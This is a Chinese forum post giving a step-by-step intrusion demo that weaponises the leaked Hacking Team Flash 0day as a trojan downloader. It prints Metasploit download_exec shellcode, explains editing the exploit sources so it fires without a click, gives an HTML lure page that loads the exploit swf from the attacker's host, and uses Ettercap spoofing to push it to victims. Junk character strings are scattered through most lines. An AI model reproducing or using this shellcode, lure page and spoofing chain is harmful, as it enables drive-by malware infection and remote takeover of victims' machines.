6 A/ U" u& \% n& z% S 三、flash 0day之手工代码修改制作下载者实例入侵演示
# t. X o% p! a3 h0 M8 W" Q0 w4 N( Q& ]/ y3 U 利用到的工具:
Msf 2 |- w4 l# }2 j+ `0 I) ]
: x( ]$ Z0 k- K3 e Ettercap ! F+ S7 R: p3 [! r: @& u" c5 e
/ w( ~; B4 T2 H! F3 \+ Q Adobe Flash CS6
9 u$ r# ]7 s0 L4 g- n* z% eHacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
/ r o0 i7 R6 F/ [+ f, z& v' P5 }8 x$ B: A. R; V; e$ x 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
7 k# k7 ^1 ~! [8 f7 N如图: $ I" h' b. H n6 i! U+ \
1 _7 B2 A9 F: w& G* |, ?, ~' M+ `! Y - @; p* |2 F4 s) n4 c Z: B9 A
) x u* W! {* h
. a) D. o+ W) h* P 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: - k( K# \5 m1 N; }- v8 M) O: Q0 u
8 `- A5 P4 T" I1 ?/ n: c6 R
1 q- h* ?- h8 ^% P# T$ y* E j
. O$ C: _" V: [' I8 o+ M5 i" G q
0 ~, q0 n$ z3 |$ l/ O 然后执行generate -t dword生成shellcode,如下: $ m- E& X$ J% n+ K$ U6 q
! x, y7 b) B7 R# H! I9 R' }! R
4 S: I2 M1 e' s. ^
复制代码到文本下便于我们一会编辑flash exp,如下:
/ K: z1 |5 f( S! H* j" H3 X1 R' q9 U7 I, }; n, k: l& t- u 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, % U) ~0 {' k2 ?* V
0 z4 s* A5 T" w$ R" m 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
; L" ~. L; ^; |0 Z x9 X- S. w% B 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
. W* ~) L& k' g) O5 j+ S# ~1 @, n 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ; z g) f) r9 c% @% v
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, ; ^8 k+ n8 I9 f+ @( L$ F4 \
8 G# ?: F! q6 E0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 3 V# z7 ?" {" V7 N7 p
8 a4 s- G. l7 T. r 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
- ^4 q( S9 k D( o4 z 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
# i' a6 K4 S, G+ @* D9 T 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, & Q2 ?4 E9 P q, N' m9 [$ F
% y- o6 t" _; \6 Y0 O4 |/ K. j 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, " j5 K# v" T. c, w9 M9 y4 ?
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, + r% H2 k+ M* z! I7 ]7 x
' g! B% H* M& {' }+ u* ?0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, . n1 l( h1 Z3 H! d j [
7 a R+ m+ t0 Z1 _+ l- {: m8 u) K1 n1 K6 l" ]8 _ 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
; ~ s2 h7 \8 r* ?1 J. R/ l, ^1 P. R% B) X% H
9 H& V7 t$ y9 B& [2 |" d% V/ B' f0 l5 `5 ?& {
下面我们来修改flash 0day exp,需要修改三个文件,分别为: ) [. u& H+ m6 {; S" s
$ Q1 w' z% S5 C- u& A- y
先修改ShellWin32.as,部分源代码如图:
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
+ }4 f+ t" g; a$ D. ~' _
( m6 A- E4 W% |# l9 s
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 8 ^9 Y& ]0 c4 z: G
1 l5 N8 o) ~. A7 b% A* K! i2 D 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: * ]2 F u* J3 p
) H$ M" K% f* ?
6 D6 c$ ~& T$ T8 y, C2 B, x
. e; L/ g9 [7 G& ^! O/ \
然后点保存,下面我们来编译一下,打开 " _' T& } n- z+ @- O8 q
0 r/ M# t) U* ?& ^+ p% l" S exp1.fla然后点文件-发布,看看编译没错误
, {/ h1 N+ ^; h$ f* t: a+ o4 B. _
; B: i( e* P' Y, r. |& t9 I; O
+ G/ t& }* h; D5 A. C" y5 _3 a: I, ^' ?+ z) B; M& i, y- e8 y 2 s, {) \' @8 {' Z- j; }; ^
* G( I7 ?3 s; s3 x; n
! W* w- w1 [1 t5 A 然后我们把生成的 V0 x* C! Q" K% m5 I* S a7 T
+ n; ^$ d* A0 f3 C5 @- x! B8 `- p) d$ |7 | exp1.swf丢到kailinux 的/var/www/html下:
$ B2 W$ Q3 B5 v6 B+ t# A+ c# ^5 Q( E; m3 d* i5 _ 然后把这段代码好好编辑一下 6 g# T4 {, T" \
& S- y5 m" p$ r [
0 M$ c1 ]: c9 W# R3 K
' C, ~2 v/ H, F" `6 A7 J* z4 Q; |" r ~( |
" N {6 `5 `* l' m7 g9 n
5 `, N7 [2 }. n2 F0 j3 N$ d }6 B# y3 m$ t* v. G& d- D
) G) W1 F: A+ U! `# r & z3 d' U( Q0 c$ @% D' o, \
% U' K6 l" w; y% R& ?2 d8 U+ F; U. y5 R8 \4 ?' A o" z/ D B <!DOCTYPE html> 2 J$ W# `. ]8 V+ {
% s8 ?4 z% w" E& S3 Q# Z. d% `/ d, `- c" {/ P; W A. | <html>
5 g6 n- O! n7 u" C( N% Q6 Y <head>
7 E" `3 V- H$ i8 ~0 ? <meta http-equiv="Content-Type" content="text/html; ; t. W& k% z! X' H! X
4 l& u" E) k0 L charset=utf-8"/>
$ C$ C! f6 B0 s$ }4 }3 K) bE$ o, |& k: e( J3 ?* J- B# R* }6 e </head>
8 H( h) ?* V6 a0 Q0 `0 g1 ?, U, X<body> 2 F: f9 Z+ n# y, r: B5 H2 m. g3 e6 b
6 c4 N( l* N3 s$ n C1 M3 A* A<h2> Please wait, the requested page is loading...</h2>
7 F& O4 ]3 r( w! c8 c: S6 ]6 \+ ~5 [ <br> 6 r2 r) ]# t, c% _0 b) O
# A o9 h( {; F" `5 ^; R2 X* Q2 S$ U6 ?* ?3 B" ~ <OBJECT
: e1 }1 w% u$ S
classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><
ARAM NAME=movie
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ! `, }8 y8 v, G* \
8 n& w) f9 }; S' g" h- B</body> 1 \9 l/ U0 z3 R; S; _- W
<script>
setTimeout(function () { 7 F5 W: H2 r/ I. A0 {- j4 ^% K& O. B
: }9 x2 @* L5 ~9 t / N) h- j8 R2 D+ q
window.location.reload(); $ h- m% f" l0 t) t( u2 c1 V; C
}, 10000);
</script>
& R7 [; [) p) [" o! q6 P3 c7 `& i </html> # J1 f* ?: M% g
Z5 t# J- \' _, I7 t
' ]' p1 Y& ?: s2 r/ D" T! {% L! I" b 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
) d* h/ C' Y5 ?, {. o& \
# Q8 k" X/ Q% h9 ]. n/ z+ {8 r
# I- F! N9 [7 S
; S1 q6 {' r4 f7 I" @
# i9 G3 S0 ^! q2 G2 ?$ k4 i( A
?' A& @/ K; i7 `/ _* V 下面我们用ettercap欺骗如图:
7 g; r+ b& m6 C" }$ M
/ L& n" ]% v3 h6 |: ?6 A 下面我们随便访问个网站看看:
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
9 j) ]: [# b! X, L$ `) ` 我们看另一台,
提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |